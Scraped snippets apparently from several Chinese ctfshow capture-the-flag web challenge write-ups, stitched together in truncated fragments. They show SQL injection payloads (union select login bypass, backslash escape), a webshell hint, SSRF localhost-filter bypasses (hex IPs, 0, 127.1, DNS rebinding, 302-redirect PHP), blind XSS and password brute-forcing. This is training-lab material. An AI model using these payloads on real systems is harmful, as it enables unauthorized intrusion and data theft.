ctfshowwwww 2.web302 查看这个函数 <?phpfunctionsds_decode($str){returnmd5(md5($str.md5(base64_encode("sds")))."sds"); }?> 需要进行 payload: 登录位置checklogin.php,1加密后就是下面的字段 userid=1' union select 'd9c77c4e454869d5d8da3b4be79694d3'%23&userpwd=1 写木马 userid=a '...
WEB 容器例如 Apache 会根据用户的请求进行简单处理后交给 php 解释器;当 Apache 收到用户对 index.php 的请求后,如果使用的是 CGI,会启动对应的 CGI 程序,对应在这里就是 PHP 的解析器。
url=http://localhost/flag.php web353 这道题和上一题比较就增加了匹配的变量,不能有localhost/127.0. 绕过方法有很多 进制绕过 url=http://0x7F000001/flag.php0.0.0.0绕过 url=http://0.0.0.0/flag.php特殊的地址0, url=http://0/flag.php还有 url=http://127.1/flag.php还有 url=http://127.000000...
前面那个String.fromCharCode生产payload web327 web328 web329 web320 web331 web322-323 参考链接 前言 以下需要师父们自己url解码哦,然后大部分使用了xss平台盲打连接最下方也有,过滤空格...
web354-过滤01 if(!preg_match('/localhost|1|0|。/i', $url)) 1. 方法一:域名指向127 在自己的域名中添加一条A记录指向 127.0.0.1 或者使用 http://sudo.cc这个域名就是指向127.0.0.1 方法二:302跳转 在自己的网站页面添加
web356(0代表本地ip) host名称的长度小于3 payload url=http://0/flag.php web357(DNS重新绑定,302跳转) <?php error_reporting(0); highlight_file(__FILE__); $url=$_POST['url']; $x=parse_url($url); if($x['scheme']==='http'||$x['scheme']==='https'){ $ip = gethostbyname($...
web384-爆破密码 提示:密码前2位是小写字母,后三位是数字 这肯定是后台密码了,而账户先盲猜admin 抓包使用intruder模块暴力破解 position只要有两个变量就可以 第一个变量-两位小写的英文字母 第二个变量-三位数字 也可以用脚本生成一个字典 import string ...
web354 DNS-Rebinding攻击绕过 url=http://r.xxxzc8.ceye.io/flag.php 自己去ceye.io注册绑定127.0.0.1然后记得前面加r 1. 302跳转绕过也行,在自己的网站主页加上这个 <?php header("Location:http://127.0.0.1/flag.php"); 1. 2. 或者说群主说我丧心病狂的方式 ...
Web234 //分页查询 $sql = "update ctfshow_user set pass = '{$password}' where username = '{$username}';"; '被过滤了,没有办法闭合,因为存在password和username两个注入点,所以可以使用\逃逸:当password=\时,原来的sql语句就变成: update ctfshow_user set pass = '\' where username = '{$usernam...
302跳转 <?php header("Location: http://127.0.0.1/flag.php"); # POST: url=http://your-domain/ssrf.php web355 <?php error_reporting(0); highlight_file(__FILE__); $url=$_POST['url']; $x=parse_url($url); if($x['scheme']==='http'||$x['scheme']==='https'){ $host=...